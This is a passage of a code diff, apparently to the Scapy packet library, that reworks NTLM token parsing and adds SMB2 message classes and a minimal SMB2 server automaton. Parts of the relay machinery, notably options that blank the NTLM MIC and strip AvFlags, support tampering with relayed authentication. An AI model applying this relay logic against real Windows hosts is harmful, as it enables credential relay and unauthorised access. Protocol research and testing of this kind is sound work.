"NTLMSSP_NEGOTIATE_128", # U + "NTLMSSP_NEGOTIATE_KEY_EXCH", # V + "NTLMSSP_NEGOTIATE_56", # W ] @@ -257,7 +308,7 @@ def _NTLMStrField(name, default): return MultipleTypeField( [ (StrFieldUtf16(name, default), - lambda pkt: pkt.NegotiateFlags.A) + lambda pkt: pkt.NegotiateFlags.NTLMSSP_NEGOTIATE_UNICODE) ], StrField(name, default), ) @@ -277,7 +328,7 @@ class _NTLM_Version(Packet): # Sect 2.2.1.1 -class NTLM_NEGOTIATE(Packet): +class NTLM_NEGOTIATE(_NTLMPayloadPacket): name = "NTLM Negotiate" messageType = 1 OFFSET = 40 @@ -364,7 +415,7 @@ def default_payload_class(self, payload): return conf.padding_layer -class NTLM_CHALLENGE(Packet): +class NTLM_CHALLENGE(_NTLMPayloadPacket): name = "NTLM Challenge" messageType = 2 OFFSET = 56 @@ -442,7 +493,7 @@ class NTLMv2_RESPONSE(Packet): ] -class NTLM_AUTHENTICATE(Packet): +class NTLM_AUTHENTICATE(_NTLMPayloadPacket): name = "NTLM Authenticate" messageType = 3 OFFSET = 88 @@ -546,6 +597,9 @@ def __init__(self, sock, **kwargs): ) def _get_token(self, token): + if not token: + return None, None, None, None + from scapy.layers.gssapi import ( GSSAPI_BLOB, SPNEGO_negToken, @@ -554,32 +608,35 @@ def _get_token(self, token): negResult = None MIC = None - if not token: - return None, negResult, MIC + rawToken = False if isinstance(token, bytes): - ntlm = NTLM_Header(token) - elif isinstance(token, conf.raw_layer): - ntlm = NTLM_Header(token.load) - else: - if isinstance(token, GSSAPI_BLOB): - token = token.innerContextToken - if isinstance(token, SPNEGO_negToken): - token = token.token - if hasattr(token, "mechListMIC") and token.mechListMIC: - MIC = token.mechListMIC.value - if hasattr(token, "negResult"): - negResult = token.negResult - try: - ntlm = token.mechToken - except AttributeError: - ntlm = token.responseToken - if isinstance(ntlm, SPNEGO_Token): - ntlm = ntlm.value - if isinstance(ntlm, ASN1_STRING): - ntlm = NTLM_Header(ntlm.val) - if isinstance(ntlm, conf.raw_layer): - ntlm = NTLM_Header(ntlm.load) + # SMB 1 - non extended + return (token, None, None, True) + if isinstance(token, (NTLM_NEGOTIATE, + NTLM_CHALLENGE, + NTLM_AUTHENTICATE, + NTLM_AUTHENTICATE_V2)): + ntlm = token + rawToken = True + if isinstance(token, GSSAPI_BLOB): + token = token.innerContextToken + if isinstance(token, SPNEGO_negToken): + token = token.token + if hasattr(token, "mechListMIC") and token.mechListMIC: + MIC = token.mechListMIC.value + if hasattr(token, "negResult"): + negResult = token.negResult + try: + ntlm = token.mechToken + except AttributeError: + ntlm = token.responseToken + if isinstance(ntlm, SPNEGO_Token): + ntlm = ntlm.value + if isinstance(ntlm, ASN1_STRING): + ntlm = NTLM_Header(ntlm.val) + if isinstance(ntlm, conf.raw_layer): + ntlm = NTLM_Header(ntlm.load) if self.DROP_MIC_v1 or self.DROP_MIC_v2: if isinstance(ntlm, NTLM_AUTHENTICATE): ntlm.MIC = b"\0" * 16 @@ -599,7 +656,7 @@ def _get_token(self, token): i + 1, AV_PAIR(AvId="MsvAvFlags", Value=0) ) - return ntlm, negResult, MIC + return ntlm, negResult, MIC, rawToken def received_ntlm_token(self, ntlm): self.token_pipe.send(ntlm) @@ -616,8 +673,8 @@ def end(self): class NTLM_Client(_NTLM_Automaton): """ - A class to overload to create a client automaton when using the - NTLM relay. + A class to overload to create a client automaton when using + NTLM. """ port = 445 cls = conf.raw_layer @@ -649,26 +706,109 @@ def wait_server(self): class NTLM_Server(_NTLM_Automaton): """ - A class to overload to create a server automaton when using the - NTLM relay. + A class to overload to create a server automaton when using + NTLM. """ port = 445 cls = conf.raw_layer + def __init__(self, *args, **kwargs): + self.cli_atmt = None + self.cli_values = dict() + self.ntlm_values = kwargs.pop("NTLM_VALUES", dict()) + self.ntlm_state = 0 + self.IDENTITIES = kwargs.pop("IDENTITIES", None) + self.SigningSessionKey = None + super(NTLM_Server, self).__init__(*args, **kwargs) + def bind(self, cli_atmt): # type: (NTLM_Client) -> None self.cli_atmt = cli_atmt def get_token(self): - return self.cli_atmt.token_pipe.recv() + from random import randint + if self.cli_atmt: + return self.cli_atmt.token_pipe.recv() + elif self.ntlm_state == 0: + self.ntlm_state = 1 + return NTLM_CHALLENGE( + ServerChallenge=self.ntlm_values.get( + "ServerChallenge", struct.pack(" "Down-level servers (pre-Windows 2012) will return + # > STATUS_NOT_SUPPORTED or STATUS_INVALID_DEVICE_REQUEST + # > since they do not allow or implement + # > FSCTL_VALIDATE_NEGOTIATE_INFO. + # > The client should accept the + # > response provided it's properly signed". + + # Since we can't sign the response, modern clients will abort + # the connection after receiving this, despite our best + # efforts... + self._response_validate_negotiate_info() return self.echo(pkt) + @ATMT.state() + def SERVING(self): + """ + Main state when serving files + """ + pass + + @ATMT.receive_condition(SERVING) + def receive_tree_connect(self, pkt): + if SMB2_Tree_Connect_Request in pkt: + raise self.SERVING().action_parameters(pkt) + + @ATMT.action(receive_tree_connect) + def send_tree_connect_response(self, pkt): + self.smb_header.TID = 0x1 + self.smb_header.MID = pkt.MID + self.send(self.smb_header / SMB2_Tree_Connect_Response( + ShareType="PIPE", + ShareFlags="AUTO_CACHING+NO_CACHING", + Capabilities=0, + MaximalAccess="+".join( + ['FILE_LIST_DIRECTORY', + 'FILE_ADD_FILE', + 'FILE_ADD_SUBDIRECTORY', + 'FILE_READ_EA', + 'FILE_WRITE_EA', + 'FILE_TRAVERSE', + 'FILE_DELETE_CHILD', + 'FILE_READ_ATTRIBUTES', + 'FILE_WRITE_ATTRIBUTES', + 'DELETE', + 'READ_CONTROL', + 'WRITE_DAC', + 'WRITE_OWNER', + 'SYNCHRONIZE', + 'ACCESS_SYSTEM_SECURITY']) + )) + + @ATMT.receive_condition(SERVING) + def receive_ioctl(self, pkt): + if SMB2_IOCTL_Request in pkt: + raise self.SERVING().action_parameters(pkt) + + @ATMT.action(receive_ioctl) + def send_ioctl_response(self, pkt): + self.smb_header.MID = pkt.MID + self._response_validate_negotiate_info() + + @ATMT.receive_condition(SERVING) + def receive_create_file(self, pkt): + if SMB2_Create_Request in pkt: + raise self.SERVING().action_parameters(pkt) + + @ATMT.action(receive_create_file) + def send_create_file_response(self, pkt): + self.smb_header.MID = pkt.MID + self.send( + self.smb_header.copy() / SMB2_Create_Response( + FileId=SMB2_FILEID(Persistent=0x4000000012, + Volatile=0x4000000001) + ) + ) + + @ATMT.receive_condition(SERVING) + def receive_query_info(self, pkt): + if SMB2_Query_Info_Request in pkt: + raise self.SERVING().action_parameters(pkt) + + @ATMT.action(receive_query_info) + def send_query_info_response(self, pkt): + self.smb_header.MID = pkt.MID + if pkt.InfoType == 0x01: # SMB2_0_INFO_FILE + if pkt.FileInfoClass == 0x05: # FileStandardInformation + self.send( + self.smb_header.copy() / SMB2_Query_Info_Response( + Buffer=[('Output', + FileStandardInformation( + AllocationSize=4096, + DeletePending=1))] + ) + ) + + @ATMT.state() + def PIPE_WRITTEN(self): + pass + + @ATMT.receive_condition(SERVING) + def receive_write_request(self, pkt): + if SMB2_Write_Request in pkt: + fi = pkt.FileId + if fi.Persistent == 0x4000000012 and fi.Volatile == 0x4000000001: + # The srvsvc file + raise self.PIPE_WRITTEN().action_parameters(pkt) + raise self.SERVING().action_parameters(pkt) + + @ATMT.action(receive_write_request) + def send_write_response(self, pkt): + self.smb_header.MID = pkt.MID + self.send( + self.smb_header.copy() / SMB2_Write_Response( + Count=len(pkt.Data) + ) + ) + + @ATMT.receive_condition(PIPE_WRITTEN) + def receive_read_request(self, pkt): + if SMB2_Read_Request in pkt: + raise self.SERVING().action_parameters(pkt) + + @ATMT.action(receive_read_request) + def send_read_response(self, pkt): + self.smb_header.MID = pkt.MID + # TODO - implement pipe logic + self.send( + self.smb_header.copy() / SMB2_Read_Response() + ) + + @ATMT.receive_condition(SERVING) + def receive_close_request(self, pkt): + if SMB2_Close_Request in pkt: + raise self.SERVING().action_parameters(pkt) + + @ATMT.action(receive_close_request) + def send_close_response(self, pkt): + self.smb_header.MID = pkt.MID + self.send( + self.smb_header.copy() / SMB2_Close_Response() + ) + @ATMT.state(final=1) def END(self): self.end() @@ -1129,7 +1338,7 @@ def continue_smb2(self): if self.CONTINUE_SMB2: self.SMB2 = True self.smb_header = NBTSession() / SMB2_Header( - AsyncId=0xfeff + PID=0xfeff ) raise self.SMB2_NEGOTIATE() @@ -1187,7 +1396,7 @@ def receive_negotiate_response(self, pkt): # SMB2 self.SMB2 = True # We are using SMB2 to talk to the server self.smb_header = NBTSession() / SMB2_Header( - AsyncId=0xfeff + PID=0xfeff ) else: # SMB1 @@ -1209,7 +1418,7 @@ def receive_negotiate_response(self, pkt): if SMB2_Negotiate_Protocol_Response in pkt and \ pkt.DialectRevision in [0x02ff, 0x03ff]: # There will be a second negotiate protocol request - self.smb_header.MessageId += 1 + self.smb_header.MID += 1 raise self.SMB2_NEGOTIATE() else: raise self.NEGOTIATED() @@ -1218,7 +1427,7 @@ def receive_negotiate_response(self, pkt): self.set_srv("Challenge", pkt.Challenge) self.set_srv("DomainName", pkt.DomainName) self.set_srv("ServerName", pkt.ServerName) - self.received_ntlm_token((None, None, None)) + self.received_ntlm_token((None, None, None, None)) raise self.NEGOTIATED() @ATMT.state() @@ -1258,15 +1467,14 @@ def SENT_SETUP_ANDX_REQUEST(self): @ATMT.action(should_send_setup_andx_request) def send_setup_andx_request(self, ntlm_tuple): - ntlm_token, negResult, MIC = ntlm_tuple + ntlm_token, negResult, MIC, rawToken = ntlm_tuple + self.smb_header.MID = self.get("MID") + self.smb_header.TID = self.get("TID") if self.SMB2: - self.smb_header.MessageId = self.get("MessageId") self.smb_header.AsyncId = self.get("AsyncId") self.smb_header.SessionId = self.get("SessionId") else: self.smb_header.UID = self.get("UID", 0) - self.smb_header.MID = self.get("MID") - self.smb_header.TID = self.get("TID") if self.SMB2 or self.EXTENDED_SECURITY: # SMB1 extended / SMB2 if self.SMB2: @@ -1290,18 +1498,21 @@ def send_setup_andx_request(self, ntlm_tuple): ) pkt.SecuritySignature = self.get("SecuritySignature") if isinstance(ntlm_token, NTLM_NEGOTIATE): - pkt.SecurityBlob = GSSAPI_BLOB( - innerContextToken=SPNEGO_negToken( - token=SPNEGO_negTokenInit( - mechTypes=[ - # NTLMSSP - SPNEGO_MechType(oid="1.3.6.1.4.1.311.2.2.10")], - mechToken=SPNEGO_Token( - value=ntlm_token + if rawToken: + pkt.SecurityBlob = ntlm_token + else: + pkt.SecurityBlob = GSSAPI_BLOB( + innerContextToken=SPNEGO_negToken( + token=SPNEGO_negTokenInit( + mechTypes=[ + # NTLMSSP + SPNEGO_MechType(oid="1.3.6.1.4.1.311.2.2.10")], # noqa: E501 + mechToken=SPNEGO_Token( + value=ntlm_token + ) ) ) ) - ) elif isinstance(ntlm_token, (NTLM_AUTHENTICATE, NTLM_AUTHENTICATE_V2)): pkt.SecurityBlob = SPNEGO_negToken( @@ -1331,10 +1542,15 @@ def send_setup_andx_request(self, ntlm_tuple): AccountName=self.get("AccountName"), ) / SMBTree_Connect_AndX( Flags="EXTENDED_RESPONSE", - Path=self.get("Path"), - Service=self.get("Service"), Password=b"\0", ) + pkt.PrimaryDomain = self.get("PrimaryDomain") + pkt.AccountName = self.get("AccountName") + pkt.Path = ( + "\\\\%s\\" % self.REAL_HOSTNAME + + self.get("Path")[2:].split("\\", 1)[1] + ) + pkt.Service = self.get("Service") self.send(pkt) @ATMT.receive_condition(SENT_SETUP_ANDX_REQUEST) @@ -1358,7 +1574,7 @@ def receive_setup_andx_response(self, pkt): ) if SMBSession_Null in pkt: # Likely an error - self.received_ntlm_token((None, None, None)) + self.received_ntlm_token((None, None, None, None)) raise self.NEGOTIATED() elif SMBSession_Setup_AndX_Response_Extended_Security in pkt or \ SMBSession_Setup_AndX_Response in pkt: @@ -1376,13 +1592,14 @@ def receive_setup_andx_response(self, pkt): # SMB2 self.set_srv("Status", pkt.Status) self.set_srv("SecuritySignature", pkt.SecuritySignature) - self.set_srv("MessageId", pkt.MessageId) + self.set_srv("MID", pkt.MID) + self.set_srv("TID", pkt.TID) self.set_srv("AsyncId", pkt.AsyncId) self.set_srv("SessionId", pkt.SessionId) if SMBSession_Setup_AndX_Response_Extended_Security in pkt or \ SMB2_Session_Setup_Response in pkt: # SMB1 extended / SMB2 - _, negResult, _ = ntlm_tuple = self._get_token( + _, negResult, _, _ = ntlm_tuple = self._get_token( pkt.SecurityBlob ) if negResult == 0: # Authenticated @@ -1416,7 +1633,7 @@ def pass_packet(self, pkt): def DO_RUN_SCRIPT(self): # This is an example script, mostly unimplemented... # Tree connect - self.smb_header.MessageId += 1 + self.smb_header.MID += 1 self.send( self.smb_header.copy() / SMB2_Tree_Connect_Request( @@ -1424,7 +1641,7 @@ def DO_RUN_SCRIPT(self): ) ) # Create srvsvc - self.smb_header.MessageId += 1 + self.smb_header.MID += 1 pkt = self.smb_header.copy() pkt.Command = "SMB2_CREATE" pkt /= Raw(load=b'9\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x12\x00\x00\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00x\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00s\x00r\x00v\x00s\x00v\x00c\x00') # noqa: E501 diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 9cd73be534a..be2de81e1c3 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -10,6 +10,7 @@ import struct from scapy.config import conf +from scapy.error import log_runtime from scapy.packet import Packet, bind_layers, bind_top_down from scapy.fields import ( ByteEnumField, @@ -21,29 +22,31 @@ IntEnumField, IntField, LEIntField, + LEIntEnumField, LELongField, LEShortEnumField, LEShortField, + MultipleTypeField, PacketField, PacketLenField, + PacketListField, ReversePadField, ShortEnumField, ShortField, StrFieldUtf16, StrFixedLenField, + StrLenField, UTCTimeField, UUIDField, XLEIntField, XLELongField, XLEShortField, - XNBytesField, XStrLenField, XStrFixedLenField, - XStrField, ) from scapy.layers.gssapi import GSSAPI_BLOB -from scapy.layers.ntlm import _NTLMPayloadField +from scapy.layers.ntlm import _NTLMPayloadField, _NTLMPayloadPacket # EnumField @@ -56,6 +59,17 @@ 0x0311: 'SMB 3.1.1', } +# SMB2 sect 3.3.5.15 + [MS-ERREF] +STATUS_ERREF = { + 0x00000000: "STATUS_SUCCESS", + 0xC000009A: "STATUS_INSUFFICIENT_RESOURCES", + 0xC0000022: "STATUS_ACCESS_DENIED", + 0xC0000128: "STATUS_FILE_CLOSED", # backup error for older Win versions + 0xC000000D: "STATUS_INVALID_PARAMETER", + 0xC00000BB: "STATUS_NOT_SUPPORTED", + 0x80000005: "STATUS_BUFFER_OVERFLOW", +} + # SMB2 sect 2.2.1.1 SMB2_COM = { 0x0000: "SMB2_NEGOTIATE", @@ -85,6 +99,9 @@ 0x0002: 'SMB2_ENCRYPTION_CAPABILITIES', 0x0003: 'SMB2_COMPRESSION_CAPABILITIES', 0x0005: 'SMB2_NETNAME_NEGOTIATE_CONTEXT_ID', + 0x0006: 'SMB2_TRANSPORT_CAPABILITIES', + 0x0007: 'SMB2_RDMA_TRANSFORM_CAPABILITIES', + 0x0008: 'SMB2_SIGNING_CAPABILITIES', } # FlagField @@ -109,20 +126,67 @@ } +# [MS-FSCC] sec 2.6 +FileAttributes = { + 0x00000001: "FILE_ATTRIBUTE_READONLY", + 0x00000002: "FILE_ATTRIBUTE_HIDDEN", + 0x00000004: "FILE_ATTRIBUTE_SYSTEM", + 0x00000010: "FILE_ATTRIBUTE_DIRECTORY", + 0x00000020: "FILE_ATTRIBUTE_ARCHIVE", + 0x00000080: "FILE_ATTRIBUTE_NORMAL", + 0x00000100: "FILE_ATTRIBUTE_TEMPORARY", + 0x00000200: "FILE_ATTRIBUTE_SPARSE_FILE", + 0x00000400: "FILE_ATTRIBUTE_REPARSE_POINT", + 0x00000800: "FILE_ATTRIBUTE_COMPRESSED", + 0x00001000: "FILE_ATTRIBUTE_OFFLINE", + 0x00002000: "FILE_ATTRIBUTE_NOT_CONTENT_INDEXED", + 0x00004000: "FILE_ATTRIBUTE_ENCRYPTED", + 0x00008000: "FILE_ATTRIBUTE_INTEGRITY_STREAM", + 0x00020000: "FILE_ATTRIBUTE_NO_SCRUB_DATA", + 0x00040000: "FILE_ATTRIBUTE_RECALL_ON_OPEN", + 0x00080000: "FILE_ATTRIBUTE_PINNED", + 0x00100000: "FILE_ATTRIBUTE_UNPINNED", + 0x00400000: "FILE_ATTRIBUTE_RECALL_ON_DATA_ACCESS", +} + + +# [MS-FSCC] sect 2.4 +FileInformationClasses = { + 5: "FileStandardInformation", +} + + +class FileStandardInformation(Packet): + fields_desc = [ + LELongField("AllocationSize", 0), + LELongField("EndOfFile", 0), + LEIntField("NumberOfLinks", 1), + ByteField("DeletePending", 0), + ByteField("Directory", 0), + ShortField("Reserved", 0), + ] + + def _SMB2_post_build(self, p, pay_offset, fields): """Util function to build the offset and populate the lengths""" for field_name, value in self.fields["Buffer"]: length = self.get_field( "Buffer").fields_map[field_name].i2len(self, value) offset = fields[field_name] + i = 0 + r = lambda y: {2: "H", 4: "I", 8: "Q"}[y] # Offset if self.getfieldval(field_name + "BufferOffset") is None: - p = p[:offset] + \ - struct.pack(" bytes + return _SMB2_post_build(self, pkt, self.OFFSET, { + "Name": 4, + "Data": 10, + }) + pay + + +# sect 2.2.13 + +SMB2_OPLOCK_LEVELS = { + 0x00: "SMB2_OPLOCK_LEVEL_NONE", + 0x01: "SMB2_OPLOCK_LEVEL_II", + 0x08: "SMB2_OPLOCK_LEVEL_EXCLUSIVE", + 0x09: "SMB2_OPLOCK_LEVEL_BATCH", + 0xff: "SMB2_OPLOCK_LEVEL_LEASE", +} + + +class SMB2_Create_Request(Packet): + name = "SMB2 CREATE Request" + OFFSET = 56 + 64 + fields_desc = [ + XLEShortField("StructureSize", 0x39), + ByteField("ShareType", 0), + ByteEnumField("RequestedOplockLevel", 0, SMB2_OPLOCK_LEVELS), + LEIntEnumField("ImpersonationLevel", 0, { + 0x00000000: "Anonymous", + 0x00000001: "Identification", + 0x00000002: "Impersonation", + 0x00000003: "Delegate", + }), + LELongField("SmbCreateFlags", 0), + LELongField("Reserved", 0), + FlagsField("DesiredAccess", 0, -32, SMB2_ACCESS_FLAGS), + FlagsField("FileAttributes", 0x00000080, -32, FileAttributes), + FlagsField("ShareAccess", 0, -32, { + 0x00000001: "FILE_SHARE_READ", + 0x00000002: "FILE_SHARE_WRITE", + 0x00000004: "FILE_SHARE_DELETE", + }), + LEIntEnumField("CreateDisposition", 1, { + 0x00000000: "FILE_SUPERSEDE", + 0x00000001: "FILE_OPEN", + 0x00000002: "FILE_CREATE", + 0x00000003: "FILE_OPEN_IF", + 0x00000004: "FILE_OVERWRITE", + 0x00000005: "FILE_OVERWRITE_IF", + }), + FlagsField("CreateOptions", 0, -32, { + 0x00000001: "FILE_DIRECTORY_FILE", + 0x00000002: "FILE_WRITE_THROUGH", + 0x00000004: "FILE_SEQUENTIAL_ONLY", + 0x00000008: "FILE_NO_INTERMEDIATE_BUFFERING", + 0x00000010: "FILE_SYNCHRONOUS_IO_ALERT", + 0x00000020: "FILE_SYNCHRONOUS_IO_NONALERT", + 0x00000040: "FILE_NON_DIRECTORY_FILE", + 0x00000100: "FILE_COMPLETE_IF_OPLOCKED", + 0x00000200: "FILE_RANDOM_ACCESS", + 0x00001000: "FILE_DELETE_ON_CLOSE", + 0x00002000: "FILE_OPEN_BY_FILE_ID", + 0x00004000: "FILE_OPEN_FOR_BACKUP_INTENT", + 0x00008000: "FILE_NO_COMPRESSION", + 0x00000400: "FILE_OPEN_REMOTE_INSTANCE", + 0x00010000: "FILE_OPEN_REQUIRING_OPLOCK", + 0x00020000: "FILE_DISALLOW_EXCLUSIVE", + 0x00100000: "FILE_RESERVE_OPFILTER", + 0x00200000: "FILE_OPEN_REPARSE_POINT", + 0x00400000: "FILE_OPEN_NO_RECALL", + 0x00800000: "FILE_OPEN_FOR_FREE_SPACE_QUERY", + }), + XLEShortField("NameBufferOffset", None), + LEShortField("NameLen", None), + XLEIntField("CreateContextsBufferOffset", None), + LEIntField("CreateContextsLen", None), + _NTLMPayloadField( + 'Buffer', OFFSET, [ + StrFieldUtf16("Name", b""), + PacketListField("CreateContexts", [], SMB2_Create_Context, + length_from=lambda pkt: pkt.CreateContextsLen), + ]) + ] + + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + return _SMB2_post_build(self, pkt, self.OFFSET, { + "Name": 44, + "CreateContexts": 48, + }) + pay + + +bind_top_down( + SMB2_Header, + SMB2_Create_Request, + Command=0x0005 +) + + # sect 2.2.14.1 class SMB2_FILEID(Packet): fields_desc = [ - LELongField("Persistent", 0), - LELongField("Volatile", 0) + XLELongField("Persistent", 0), + XLELongField("Volatile", 0) + ] + + def default_payload_class(self, payload): + return conf.padding_layer + +# sect 2.2.14 + + +class SMB2_Create_Response(Packet): + name = "SMB2 CREATE Response" + OFFSET = 88 + 64 + fields_desc = [ + XLEShortField("StructureSize", 0x59), + ByteEnumField("OplockLevel", 0, SMB2_OPLOCK_LEVELS), + FlagsField("Flags", 0, -8, {0x01: "SMB2_CREATE_FLAG_REPARSEPOINT"}), + LEIntEnumField("CreateAction", 1, { + 0x00000000: "FILE_SUPERSEDED", + 0x00000001: "FILE_OPENED", + 0x00000002: "FILE_CREATED", + 0x00000003: "FILE_OVERWRITEN", + }), + UTCTimeField("CreationTime", None, fmt=" bytes + return _SMB2_post_build(self, pkt, self.OFFSET, { + "CreateContexts": 80, + }) + pay + + +bind_top_down( + SMB2_Header, + SMB2_Create_Response, + Command=0x0005, + Flags=1 +) + # sect 2.2.15 @@ -649,7 +1001,7 @@ class SMB2_Close_Request(Packet): fields_desc = [ XLEShortField("StructureSize", 0x18), FlagsField("Flags", 0, -16, - ["POSTQUERY_ATTRIB"]), + ["SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB"]), LEIntField("Reserved", 0), PacketField("FileId", SMB2_FILEID(), SMB2_FILEID) ] @@ -661,29 +1013,260 @@ class SMB2_Close_Request(Packet): Command=0x0006, ) +# sect 2.2.16 + + +class SMB2_Close_Response(Packet): + name = "SMB2 CLOSE Response" + fields_desc = [ + XLEShortField("StructureSize", 0x3c), + FlagsField("Flags", 0, -16, + ["SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB"]), + LEIntField("Reserved", 0), + ] + SMB2_Create_Response.fields_desc[4:11] + + +bind_top_down( + SMB2_Header, + SMB2_Close_Response, + Command=0x0006, + Flags=1, +) + +# sect 2.2.19 + + +class SMB2_Read_Request(_NTLMPayloadPacket): + name = "SMB2 READ Request" + OFFSET = 48 + 64 + _NTLM_PAYLOAD_FIELD_NAME = "Buffer" + fields_desc = [ + XLEShortField("StructureSize", 0x31), + ByteField("Padding", 0), + FlagsField("Flags", 0, -8, { + 0x01: "SMB2_READFLAG_READ_UNBUFFERED", + 0x02: "SMB2_READFLAG_REQUEST_COMPRESSED", + }), + LEIntField("Length", 0), + LELongField("Offset", 0), + PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), + LEIntField("MinimumCount", 0), + LEIntEnumField("Channel", 0, { + 0x00000000: "SMB2_CHANNEL_NONE", + 0x00000001: "SMB2_CHANNEL_RDMA_V1", + 0x00000002: "SMB2_CHANNEL_RDMA_V1_INVALIDATE", + 0x00000003: "SMB2_CHANNEL_RDMA_TRANSFORM", + }), + LEIntField("RemainingBytes", 0), + LEShortField("ReadChannelInfoBufferOffset", None), + LEShortField("ReadChannelInfoLen", None), + _NTLMPayloadField( + 'Buffer', OFFSET, [ + StrLenField("ReadChannelInfo", b"", + length_from=lambda pkt: pkt.ReadChannelInfoLen) + ]) + ] + + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + return _SMB2_post_build(self, pkt, self.OFFSET, { + "ReadChannelInfo": 44, + }) + pay + + +bind_top_down( + SMB2_Header, + SMB2_Read_Request, + Command=0x0008, +) + +# sect 2.2.20 + + +class SMB2_Read_Response(_NTLMPayloadPacket): + name = "SMB2 READ Response" + OFFSET = 16 + 64 + _NTLM_PAYLOAD_FIELD_NAME = "Buffer" + fields_desc = [ + XLEShortField("StructureSize", 0x31), + LEShortField("DataBufferOffset", None), + LEIntField("DataLen", None), + LEIntField("DataRemaining", 0), + FlagsField("Flags", 0, -32, { + 0x01: "SMB2_READFLAG_RESPONSE_RDMA_TRANSFORM", + }), + _NTLMPayloadField( + 'Buffer', OFFSET, [ + StrLenField("Data", b"", + length_from=lambda pkt: pkt.DataLen) + ]) + ] + + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + return _SMB2_post_build(self, pkt, self.OFFSET, { + "Data": 4, + }) + pay + + +bind_top_down( + SMB2_Header, + SMB2_Read_Response, + Command=0x0008, + Flags=1, +) + + +# sect 2.2.21 + + +class SMB2_Write_Request(_NTLMPayloadPacket): + name = "SMB2 WRITE Request" + OFFSET = 48 + 64 + _NTLM_PAYLOAD_FIELD_NAME = "Buffer" + fields_desc = [ + XLEShortField("StructureSize", 0x31), + LEShortField("DataBufferOffset", None), + LEIntField("DataLen", None), + LELongField("Offset", 0), + PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), + LEIntEnumField("Channel", 0, { + 0x00000000: "SMB2_CHANNEL_NONE", + 0x00000001: "SMB2_CHANNEL_RDMA_V1", + 0x00000002: "SMB2_CHANNEL_RDMA_V1_INVALIDATE", + 0x00000003: "SMB2_CHANNEL_RDMA_TRANSFORM", + }), + LEIntField("RemainingBytes", 0), + LEShortField("WriteChannelInfoBufferOffset", None), + LEShortField("WriteChannelInfoLen", None), + FlagsField("Flags", 0, -32, { + 0x00000001: "SMB2_WRITEFLAG_WRITE_THROUGH", + 0x00000002: "SMB2_WRITEFLAG_WRITE_UNBUFFERED", + }), + _NTLMPayloadField( + 'Buffer', OFFSET, [ + StrLenField("Data", b"", + length_from=lambda pkt: pkt.DataLen), + StrLenField("WriteChannelInfo", b"", + length_from=lambda pkt: pkt.WriteChannelInfoLen) + ]) + ] + + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + return _SMB2_post_build(self, pkt, self.OFFSET, { + "Data": 2, + "WriteChannelInfo": 40, + }) + pay + + +bind_top_down( + SMB2_Header, + SMB2_Write_Request, + Command=0x0009, +) + +# sect 2.2.22 + + +class SMB2_Write_Response(Packet): + name = "SMB2 WRITE Response" + fields_desc = [ + XLEShortField("StructureSize", 0x11), + LEShortField("Reserved", 0), + LEIntField("Count", 0), + LEIntField("Remaining", 0), + LEShortField("WriteChannelInfoBufferOffset", 0), + LEShortField("WriteChannelInfoLen", 0), + ] + + +bind_top_down( + SMB2_Header, + SMB2_Write_Response, + Command=0x0009, + Flags=1 +) + +# sect 2.2.31.4 + + +class SMB2_IOCTL_Validate_Negotiate_Info(Packet): + name = "SMB2 IOCTL Validate Negotiate Info" + fields_desc = ( + SMB2_Negotiate_Protocol_Request.fields_desc[4:6] + # Cap/GUID + SMB2_Negotiate_Protocol_Request.fields_desc[1:3][::-1] + # SecMod/DC + [SMB2_Negotiate_Protocol_Request.fields_desc[9]] # Dialects + ) + + +class _SMB2_IOCTL_PacketLenField(PacketLenField): + def m2i(self, pkt, m): + if pkt.CtlCode == 0x00140204: # FSCTL_VALIDATE_NEGOTIATE_INFO + return SMB2_IOCTL_Validate_Negotiate_Info(m) + return conf.raw_layer(m) + # sect 2.2.31 class SMB2_IOCTL_Request(Packet): name = "SMB2 IOCTL Request" - # Barely implemented + OFFSET = 56 + 64 + deprecated_fields = { + "IntputCount": ("InputLen", "alias"), + "OutputCount": ("OutputLen", "alias"), + } fields_desc = [ XLEShortField("StructureSize", 0x39), LEShortField("Reserved", 0), - LEIntField("CtlCode", 0), - XStrFixedLenField("FileId", b"", length=16), - LEIntField("InputOffset", 0), - LEIntField("InputCount", 0), + LEIntEnumField("CtlCode", 0, { + 0x00060194: "FSCTL_DFS_GET_REFERRALS", + 0x0011400C: "FSCTL_PIPE_PEEK", + 0x00110018: "FSCTL_PIPE_WAIT", + 0x0011C017: "FSCTL_PIPE_TRANSCEIVE", + 0x001440F2: "FSCTL_SRV_COPYCHUNK", + 0x00144064: "FSCTL_SRV_ENUMERATE_SNAPSHOTS", + 0x00140078: "FSCTL_SRV_REQUEST_RESUME_KEY", + 0x001441bb: "FSCTL_SRV_READ_HASH", + 0x001480F2: "FSCTL_SRV_COPYCHUNK_WRITE", + 0x001401D4: "FSCTL_LMR_REQUEST_RESILIENCY", + 0x001401FC: "FSCTL_QUERY_NETWORK_INTERFACE_INFO", + 0x000900A4: "FSCTL_SET_REPARSE_POINT", + 0x000601B0: "FSCTL_DFS_GET_REFERRALS_EX", + 0x00098208: "FSCTL_FILE_LEVEL_TRIM", + 0x00140204: "FSCTL_VALIDATE_NEGOTIATE_INFO", + }), + PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), + LEIntField("InputBufferOffset", None), + LEIntField("InputLen", None), # Called InputCount but it's a length LEIntField("MaxInputResponse", 0), - LEIntField("OutputOffset", 0), - LEIntField("OutputCount", 0), + LEIntField("OutputBufferOffset", None), + LEIntField("OutputLen", None), # Called OutputCount. LEIntField("MaxOutputResponse", 0), - LEIntField("Flags", 0), + FlagsField("Flags", 0, -32, { + 0x00000001: "SMB2_0_IOCTL_IS_FSCTL" + }), LEIntField("Reserved2", 0), - XStrField("Buffer", b""), + _NTLMPayloadField( + 'Buffer', OFFSET, [ + _SMB2_IOCTL_PacketLenField( + "Input", None, conf.raw_layer, + length_from=lambda pkt: pkt.InputLen), + 